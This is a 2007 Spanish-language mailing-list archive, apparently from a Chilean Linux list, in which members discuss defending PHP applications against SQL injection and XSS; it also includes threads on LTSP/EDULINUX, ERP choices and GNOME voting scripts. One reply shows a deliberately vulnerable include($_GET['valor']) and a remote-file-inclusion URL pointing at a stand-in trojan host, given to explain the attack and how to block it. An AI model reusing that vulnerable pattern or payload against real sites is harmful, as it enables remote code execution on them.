Evitar sql injection y xss
Raul Perez escribió: Salud a todos Tengo mysql 5 y phpp 5 en un servidor con centos La pregunta es que codigo han implementado ustedes para asegurar sus aplicaciones en php para evitar injection de sql y xss Ok, veamos. Para prevenir XSS, utiliza un sistema de templates como PHPTAL, Html_template_flexy o cualquier otro que siga la siguiente regla elemental : pasar por htmlspecialchars con la codificacion correcta cualquier placeholder al que se le asignen variables a mostrar en pantalla, a no ser que tu deliberadamente le digas lo contrario. ( esto es un sistema de whitelist) cualquier otra forma es propensa a demasiados errores involuntarios. Puedes validar con expresiones regulares u otros por otras razones, pero lo mas imporante es la forma en la cual los datos son **enviados** al navegador, no de la forma que son recibidos, XSS mas que un problema de input es de **output**, evita modificar,eliminar,alterar los datos enviados por el usuario, si no corresponden al formato esperado, emite un error, si es de formato libre, solo preocupate de que cuando estos se muestren el navegador, este los interprete de forma segura y recuerda que esto es valido tanto como para los datos que vienen desde usuario como los que vienen de la DB.( si olvidas esto ultimo vas a caer en una injeccion de segundo orden donde te atacan con los datos ya almacenados ;) ) Para prevenir sql injection, utiliza un sistema de ORM o en su defecto alguna biblioteca especializada como Creole, Adodb , MDB2 , PDO que permita utilizar consultas preparadas y/o bound parameters y obliga al programador a utilizarlas como costumbre, en todas las consultas que utilizen variables, no importa si esas variables vienen o no vienen directamente del usuario..cualquier otro metodo que utilizes vas en directa picada al fracaso, porque siempre se te puede olvidar utilizar mysql_real_escape_string() en 1 de las miles o millones de variables que pueda tener tu aplicacion. Ademas asegurate que tu base de datos utilize la misma codificacion de caracteres que tu aplicacion y que el cliente que se conecta a esta tambien, en ciertos casos puede generarse un problema de seguridad cuando la codificacion de caracteres no coincide. Por ultimo no utilizar addslashes() o cualquier otra funcion tuya para escapar los parametros de las consultas, utiliza solo las funciones especificas y recomendadas para cada DBMS en particular. Espero que te sea de ayuda. Saludos. -- You don't have to burn books to destroy a culture. Just get people to stop reading them. --Ray Bradbury Cristian Rodríguez R. SUSE LINUX Products GmbH Research Development From [EMAIL PROTECTED] Fri Sep 21 09:50:12 2007 From: [EMAIL PROTECTED] (marco olivares) Date: Fri Sep 21 10:18:13 2007 Subject: OT: EDULINUX In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] El día 20/09/07, Marcos Vargas [EMAIL PROTECTED] escribió: Hola Les cuento el escenario es el siguiente: Tenemos una red con un dhcp con linux y queremos colocar un LTSP Edulinux funcionando tambien en esta red, modificamos el dhcp.conf y algunas configuraciones de este servidor y esta funcionando, pero el problema que tenemos, es que no esta funcionando el mouse en las estaciones, este edulinux tiene un administrador grafico de estaciones, que al modificar el tipo de mouse de la estacion no graba los cambios, por lo cual necesito saber el nombre y donde esta ubicado el archivo en el cual quedan grabadas estas modificaciones ya que graficamente no funciona. ... a mi me funciona debes seleccionar el cliente con su mac respectiva... y presionar el boton regenar escritorioo ir a herramientas y regenerar todos los escritorios nota: es un servidor para el EDULINUX con su propio dhcp pero esta funcionando solamente con las mac de las tarjetas de las estaciones viejas yo los uso con pxe, y con etherboot con floppy y hdd... tengo 15 estaciones...amd 450MHZ con 120 RAM. espero te sirva... -- Marcos Vargas Hormazabal -- Marco Rojas O. Usuario Linux Registrado http://counter.li.org/cgi-bin/certificate.cgi/396707 From [EMAIL PROTECTED] Fri Sep 21 10:56:33 2007 From: [EMAIL PROTECTED] (Marcos Vargas) Date: Fri Sep 21 10:58:57 2007 Subject: OT: EDULINUX In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] lo que pasa es que tengo 2 dhcp en mi red, el que tenia antes de instalar EDULINUX que esta hecho en linux ademas es dominio de mi red y funciona solo con las mac y el nuevo servidor que esta funcionando de igual manera con un ambito especifico para que le de solo ip a las estaciones viejas y ademas envie el LTSP a estas a traves de floppy.Al hacer estas modificaciones las hice directamente al dhcpd.conf y al parecer el administrador de estaciones se mareo y no graba las modificaciones para las estaciones como la tarjeta de sonido, el mouse, etc., por lo cual necesito si alguien sabe cual
Evitar sql injection y xss
Rodrigo Fuentealba escribió: El 20/09/07, Raul Perez [EMAIL PROTECTED] escribió: Salud a todos Tengo mysql 5 y phpp 5 en un servidor con centos La pregunta es que codigo han implementado ustedes para asegurar sus aplicaciones en php para evitar injection de sql y xss Para prevenir XSS, simplemente nunca hagas algo como esto: ?php include($_GET['valor']); ? Eso es RFI ( Remote File Inclusion ), no XSS. Porque con eso yo podría poner una URL como: http://www.victima.com/index.php?valor=http://www.troyano.com/troyano.txt Y el código que tenga en troyano.txt se va a ejecutar en tu PC, lo quieras o no. Una manera de impedir algo así es, en PHP 5, poner lo siguiente en tu archivo php.ini allow_url_include = Off Intente con mysql real escape string pero no se por que no me funciona Puedo desarrollar una funcion pero me da temor de que deje algun ueco de seguridad Para prevenir inyecciones SQL, no uses tus propias funciones. Mira ADOdb (http://adodb.sourceforge.net) y Propel (http://propel.phpdb.org) que son dos programas que puedes usar dentro de tus programas para manejar tus bases de datos, que evitan las inyecciones de código SQL. A pesar de ser más difícil, a mí me gustó más Propel que ADOdb.
Evitar sql injection y xss
El 21/09/07, Claudio Salazar [EMAIL PROTECTED] escribió: Eso es RFI ( Remote File Inclusion ), no XSS. AFAIK, RFI == una subclase de XSS. Varias de las idioteces de ese estilo las he leido como XSS. -- Rodrigo Fuentealba
Evitar sql injection y xss
Cristian Rodriguez escribió: Claudio Salazar escribió: Lo importante para prevenir XSS es la validacion de los datos, No, no su validacion si no que la forma en la cual son mostrados en pantalla. Lo decia una linea despues. si bien se pueden crear funciones con expresiones regulares para detectar patrones, No, solo preocupate de **mostrarlas** con las caracteres potencialmente dañinos. Feo output, de todas manera unas palabras mas adelante no les daba mi aprobacion. Lo mencione porque he visto que tambien tratan asi de evitar XSS. Para prevenir XSS puedes ocupar funciones como htmlspecialchars(), addslashes() que combinadas dan buenos resultados. que combinadas dejan la escoba ... Cierto, me quedo con htmlspecialchars. Por que no te funciona mysql_real_escape_string() ? Solo sirve para sanitizar los datos que se ingresan en las consultas, antes de aplicar mysql_query(). Mas info en http://www.php.net/manual/es/function.mysql-real-escape-string.php . huh ? mysql_real_escape_string() no es para prevenir XSS.. Hice un salto de linea para cambiar de tema, tambien mencionaba que no le funcionaba esa funcion y el asunto tambien trata sobre sql injection. Tambien podrias ver otras aplicaciones como ModSecurity o Core Grasp que añaden seguridad a aplicaciones web. Peligrosa tu recomendacion. Ahora no basta con preocuparse solo de XSS e inyecciones SQL, funciones como mail() ya estan siendo foco de inyecciones y asi cada dia nuevas, y no discutiremos que es necesario que un programador debe partir por la seguridad de su codigo, pero una ayudita no le hace mal a nadie. From [EMAIL PROTECTED] Fri Sep 21 14:59:49 2007 From: [EMAIL PROTECTED] (Alvaro Herrera) Date: Fri Sep 21 15:02:20 2007 Subject: Evitar sql injection y xss In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Claudio Salazar escribió: Cristian Rodriguez escribió: No, solo preocupate de **mostrarlas** con las caracteres potencialmente dañinos. Feo output, de todas manera unas palabras mas adelante no les daba mi aprobacion. Lo mencione porque he visto que tambien tratan asi de evitar XSS. Cristian tiene razon. Para evitar el XSS, lo que hay que hacer es evitar que el navegador interprete el tag como si fuera HTML. Para esto, lo mas facil es escapar los caracteres peligrosos (creo que con escapar el deberia ser suficiente pero no estoy seguro). Asi, cualquier HTML que el atacante quiera hacer pasar por tu sitio, se veria como un pedazo de texto en el navegador del usuario, con lo cual el ataque deja de funcionar (por ej. si es un link, ya no es cliqueable). -- Alvaro Herrerahttp://www.advogato.org/person/alvherre El número de instalaciones de UNIX se ha elevado a 10, y se espera que este número aumente (UPM, 1972) From [EMAIL PROTECTED] Fri Sep 21 15:02:59 2007 From: [EMAIL PROTECTED] (Alvaro Herrera) Date: Fri Sep 21 15:05:25 2007 Subject: Autenticacion Centralizada In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Sebastian Antunez Noguera escribió: Estimados Listeros, en la empresa vamos a migrar el actual servidor de Fedora Core 7 a Redhat ES 5. Me pidieron que investigara poner un sistema de autenticacion centralizada donde los usuarios puedan ingresar con una password y usuario unico a las siguientes aplicaciones ¿Has considerado instalar un sistema Kerberos? -- Alvaro Herrera Valdivia, Chile ICBM: S 39º 49' 18.1, W 73º 13' 56.4 Those who use electric razors are infidels destined to burn in hell while we drink from rivers of beer, download free vids and mingle with naked well shaved babes. (http://slashdot.org/comments.pl?sid=44793cid=4647152) From [EMAIL PROTECTED] Fri Sep 21 15:05:48 2007 From: [EMAIL PROTECTED] (marco olivares) Date: Fri Sep 21 15:08:13 2007 Subject: OT: EDULINUX In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] El día 21/09/07, Marcos Vargas [EMAIL PROTECTED] escribió: lo que pasa es que tengo 2 dhcp en mi red, el que tenia antes de instalar EDULINUX que esta hecho en linux ademas es dominio de mi red y funciona solo con las mac y el nuevo servidor que esta funcionando de igual manera con un ambito especifico para que le de solo ip a las estaciones viejas y ademas envie el LTSP a estas a traves de floppy.Al hacer estas modificaciones las hice directamente al dhcpd.conf y al parecer el administrador de estaciones se mareo y no graba las modificaciones para las estaciones como la tarjeta de sonido, el mouse, etc., por lo cual necesito si alguien sabe cual es el archivo especifico en el cual se graban estas modificaciones para cada estacion como el mouse, video, audio etc. Muchas Gracias ... dentro de
Evitar sql injection y xss
El 21/09/07, Alvaro Herrera [EMAIL PROTECTED] escribió: Claudio Salazar escribió: Cristian Rodriguez escribió: No, solo preocupate de **mostrarlas** con las caracteres potencialmente dañinos. Cristian tiene razon. Para evitar el XSS, lo que hay que hacer es evitar que el navegador interprete el tag como si fuera HTML. Para esto, lo mas facil es escapar los caracteres peligrosos (creo que con escapar el deberia ser suficiente pero no estoy seguro). Si te pones a pensar en todas las posibilidades, no es suficiente. Ponte a pensar en un trozo de código que quieres postear (pensando en un blog, naturalmente; o en una aplicación de educación a distancia, como una que estoy haciendo ahora). Asi, cualquier HTML que el atacante quiera hacer pasar por tu sitio, se veria como un pedazo de texto en el navegador del usuario, con lo cual el ataque deja de funcionar (por ej. si es un link, ya no es cliqueable). IMHO, si bien tiene razón en un aspecto, en otros que son igualmente comunes, no sirve de tanto esa forma. Generalmente para algunas aplicaciones necesitamos guardar tags html como válidos (por ejemplo, aplicaciones con contenido dinámico como los portales de periódicos en línea). Llevar un tracking de aquellos elementos que en un nombre de pila no serían permitidos pero en el campo contenido de un blog sí lo son, en tablas separadas horribiliza el modelo, hace más compleja la programación y al final se me ocurren dos soluciones: 1.- Guardar el contenido del fckeditor o el tiny_mce, tal como se genera, en la base. 2.- Generar una suerte de metalenguaje que me permita insertar imágenes y links sin usar tags html, como {% img=imagen.jpg style= %} o {% link=http://www.google.cl; text=Google %} (algo como el funcionamiento de los BBCodes) Ok, con la primera, volvemos a lo mismo, salvo que validemos todo el resto de los datos al momento de ingresar en la base de datos; la forma correcta de hacer las cosas es la forma más natural. Con la segunda, difícilmente llegaremos a hacer algo realmente bueno, por ejemplo con tablas (critíquenme por las tablas, pero que conste que a veces necesitamos insertar datos tabulares), y el esfuerzo será útil, pero siempre nos quedaremos cortos. Mi idea es, lógicamente, pensando en DRY y KISS. -- Rodrigo Fuentealba
desarrollo deaAplicacion grande
Graciela Urquieta [EMAIL PROTECTED] wrote: Hola, de principio gracias a todos por responder y dar sus sugerencias, a lo mejor que algunas cosas no las upe explicar bien, ahora detallo esas, para que tengan una idea mas clara: * Tengo enetendio que si se busco, para ver si existia aplicaciones que cumplan con los requerimientos, lastimosamente no encontraron una. ademas que para ir desarrollando modulos faltantes sobre alguna aplicacion candidata, decidieron que era preferible desarrollarla completa. Tal como te dijieron antes, esto indica que no tienen la menor idea de la cantidad de trabajo que significa desarrollar tal cosa de cero. Ve preparando tu CV y buscando un puesto en un lugar mas civilizado... * Para que tengan una idea la aplicacion no solo toca aspectos financieros, mas alcontrario toma aspectos de control y seguimiento de proyectos de inversion (pagos, reversiones, etc), adquisiciones nacionales e internacionales, manejo de cartera para creditos a sectores productivos, control y seguimiento de obras financiadas por distintos organismos (gubernamentales, ongs, etc) y varios otros modulos relacionados con financiamientos a proyectos. Se le llama ERP. Hay algunas empresitas que se dedican a ese negocio (entre las que se cuenta la 2a empresa solo software del mercado), las opciones completas que ofrecen parten de cerca de un palo (de los verdes). Tienen opciones mas baratas para empresas pequen~as a medianas (escala yanqui, o sea, lo que aca pasa por medianas-grandes a muy-muy-grandes)... si quieres algo razonable (y OSS) en el rango chico-mediano, analiza TinyERP. * El tiempo previsto es de 10 meses, contatando almenos 10 desarrolladores expertos en la herramienta, tambien se planifico una capcitacion para todos los que ya trabajamos para que estemos al nivel de los contratados. Arreglatelas para estar fuera de alli en 6 meses mas (porque por alli se comenzaran a dar cuenta que les faltan 100 desarrolladores y 5 an~os para cumplir lo que quieren, y...) -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria +56 32 2654239 Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513 From [EMAIL PROTECTED] Fri Sep 21 15:55:15 2007 From: [EMAIL PROTECTED] (Horst H. von Brand) Date: Fri Sep 21 15:57:38 2007 Subject: desarrollo deaAplicacion grande In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Rodrigo Fuentealba [EMAIL PROTECTED] wrote: El 20/09/07, Hugo Figueroa R. [EMAIL PROTECTED] escribió: --- Jorge Riquelme Santana [EMAIL PROTECTED] escribió: Como acotación, en mi humilde opinión php no es una buena elección para desarrollar grandes aplicaciones empresariales. Seria bueno decir los motivos por que no es buena eleccion, experiencia propia, comparativa, yo creo que php5 mas un buen framework y un desarrollador que ocupe buenas practicas seria suficiente Yes sir. PHP4 más un framework que no sea tan extensible más un desarrollador que tenga que meterle módulos a mano, podrÃa fácilmente echarse al saco un desarrollo bueno. Eso es valido en cualquier lenguaje. Un lenguaje en el que no sea posible cometer crimenes simplemente no es digno de usarse (Turing-completo y todo eso). el unico punto en contra que veo es que en php nunca se han puesto de acuerdo en que framework usar como estandar, pero creo que si se usan los tres mas populares (zend, cake, symfony) se esta dando un salto a una posible estandarizacion. PHP es un lenguaje tal como C; Si los tipos que hacen C se pusieran de acuerdo en qué IDE utilizar, Claro, vamos a la guerra santa vi vs emacs de nuevo... se está dando un salto a una posible estandarización, pero, ¿de qué sirve que todos los desarrolladores de C utilicen Anjuta, por ejemplo?. Ninguno de los que conozco usan Anjuta... Los tipos de Ruby no se han puesto de acuerdo en utilizar a Ruby on Rails; Igual que la gente que escribe C no se ha puesto de acuerdo en usar gtk2. Doh... si yo quiero otro framework, puedo hacerlo (el tema es que RoR está tan extendido que serÃa mejor seguir aguas y construir aplicaciones on top of RoR). Esa es la idea: RoR es un framework, /hecho en Ruby/. Hay otros. Estás viendo PHP más un Framework como un todo, cuando debes evaluar primero lo que te ofrece PHP como lenguaje, saber qué te sirve y qué te complica, saber qué problemas podrÃas tener con él y sólo recién después de eso, evaluar un Framework/CMS que te de lo necesario para tu aplicación. Si sólo necesitas un portal, ¿para qué complicarse la vida con Symfony, si puedes usar e107 o cualquiera de esas cosas?. Disculpa, si se va a
sistema de votacion
El 21/09/07, Germán Poó-Caamaño [EMAIL PROTECTED] escribió: On Thu, 2007-09-20 at 16:05 -0400, Alvaro Herrera wrote: [...] No era para la GUADEC, sino para la elección del Directorio de la Fundación GNOME. Una explicación general se encuentra en: http://www.encuentrolinux.cl/pipermail/encuentro/2006-November/000430.html Aunque según entiendo, lo que requiere Victor Hugo es algo más simple. bueno.. ya habia leido el correo este.. y de alla salio mis dudas, ya que en el correo, explica como funciona en teoria el sistema, pero no emtrega datos tecnicos !!! por ejemplo: crearon el sistema para hacer las balotas desde la nada o es algun sistema que ya existe y que se puede encontrar en freshmeat ??? hay mas documentacion o alguna palabra clave para buscar en internet y saber como podria implementarlo ??? salu2 y gracias -- -- Victor Hugo dos Santos Linux Counter #224399
sistema de votacion
On Fri, 2007-09-21 at 16:46 -0400, Victor Hugo dos Santos wrote: El 21/09/07, Germán Poó-Caamaño [EMAIL PROTECTED] escribió: On Thu, 2007-09-20 at 16:05 -0400, Alvaro Herrera wrote: [...] No era para la GUADEC, sino para la elección del Directorio de la Fundación GNOME. Una explicación general se encuentra en: http://www.encuentrolinux.cl/pipermail/encuentro/2006-November/000430.html Aunque según entiendo, lo que requiere Victor Hugo es algo más simple. bueno.. ya habia leido el correo este.. y de alla salio mis dudas, ya que en el correo, explica como funciona en teoria el sistema, pero no emtrega datos tecnicos !!! por ejemplo: crearon el sistema para hacer las balotas desde la nada o es algun sistema que ya existe y que se puede encontrar en freshmeat ??? hay mas documentacion o alguna palabra clave para buscar en internet y saber como podria implementarlo ??? Interesante. No había reparado en que no estaban en línea, excepto el script de conteo de votos. Los scripts en un inicio se encuentra en: http://www.gnome.org/~vuntz/tmp/gfmc/ Luego, se modificaron y no logro dar con ellos. Seguramente quedaron obsoletos con el cambio de sistema de votación y la migración de CVS a SVN en GNOME (limpieza de por medio). Los scripts para el Encuentro Linux puedes tomarlos desde: http://www.gnome.org/~gpoo/hg/vote/ De allí puedes bajar un tar.gz si no tienes Mercurial. Tiene algunas modificaciones. De hecho, antes de subirlos los apliqué y añadí otras líneas para hacerlo más legible. PS: El ChangeLog tiene algunas inconsistencias, así que no te asustes. -- Germán Poó Caamaño Concepción - Chile
Evitar sql injection y xss
Rodrigo Fuentealba [EMAIL PROTECTED] wrote: El 21/09/07, Alvaro Herrera [EMAIL PROTECTED] escribió: Claudio Salazar escribió: Cristian Rodriguez escribió: No, solo preocupate de **mostrarlas** con las caracteres potencialmente dañinos. Cristian tiene razon. Para evitar el XSS, lo que hay que hacer es evitar que el navegador interprete el tag como si fuera HTML. Para esto, lo mas facil es escapar los caracteres peligrosos (creo que con escapar el deberia ser suficiente pero no estoy seguro). Si te pones a pensar en todas las posibilidades, no es suficiente. Revisa http://www.dwheeler.com/secure-programs para una larga lista de sugerencias... Ponte a pensar en un trozo de código que quieres postear (pensando en un blog, naturalmente; o en una aplicación de educación a distancia, como una que estoy haciendo ahora). Si revisas las cosas que los blogs aguantan como tags en sus comentarios, suelen ser /muy/ limitados. Y a que te refieres con aplicacion de educacion a distancia? De esas cosas ya hay miles como codigo abierto... elige una, y ya. [Por lo demas, estamos en la fase de entusiasmo debordado, implementemos! del ciclo de 5 an~os de esas cosas... en cosa de un an~o se daran cuenta (nuevamente) que no es /tan/ facil, luego pasan dos an~os para que a todos se les olvide el descalabro, y copmenzamos nuevamente por lo de no seria buena idea...] [...] Llevar un tracking de aquellos elementos que en un nombre de pila no serÃan permitidos pero en el campo contenido de un blog sà lo son, Bienvenido al mundo de se requiere validar los datos... en tablas separadas horribiliza el modelo, hace más compleja la programación y al final se me ocurren dos soluciones: 1.- Guardar el contenido del fckeditor o el tiny_mce, tal como se genera, en la base. 2.- Generar una suerte de metalenguaje que me permita insertar imágenes y links sin usar tags html, como {% img=imagen.jpg style= %} o {% link=http://www.google.cl; text=Google %} (algo como el funcionamiento de los BBCodes) No. Revisa como lo hacen los paquetes para blogs (http://www.geeklog.net hace funcionar http://www.groklaw.net). La gente de http://lwn.net tiene algo tejido en casa, que les tomo /an~os/ perfeccionar, y que no publican porque les da verguenza lo sucio del codigo... -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria +56 32 2654239 Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513 From [EMAIL PROTECTED] Fri Sep 21 22:54:34 2007 From: [EMAIL PROTECTED] (Horst H. von Brand) Date: Fri Sep 21 22:56:58 2007 Subject: desarrollo deaAplicacion grande In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Rodrigo Fuentealba [EMAIL PROTECTED] wrote: El 21/09/07, Horst H. von Brand [EMAIL PROTECTED] escribió: Graciela Urquieta [EMAIL PROTECTED] wrote: [...] [ ... descripción de un ERP ... ] Se le llama ERP. Hay algunas empresitas que se dedican a ese negocio (entre las que se cuenta la 2a empresa solo software del mercado) SAP? Oracle? Solomon? SAP. las opciones completas que ofrecen parten de cerca de un palo (de los verdes). Yep, es carÃsimo. Y cuesta al menos un an~o de trabajo ajustar la empresa al paquete y viceversa... Tienen opciones mas baratas para empresas pequen~as a medianas (escala yanqui, o sea, lo que aca pasa por medianas-grandes a muy-muy-grandes)... si quieres algo razonable (y OSS) en el rango chico-mediano, analiza TinyERP. IMHO, OpenBravo también es una buena opción; además (no conozco TinyERP), es viable tanto para Oracle como para PostgreSQL. Si parten en esa base y además necesitan aplicaciones medio no estándares, pueden partir por esa base de datos. Mencione TinyERP porque esta para Fedora (y para instalarlo en un RHEL/CentOS reciente es a lo mas tomar el SRPM y darle con rpmbuild). -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria +56 32 2654239 Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513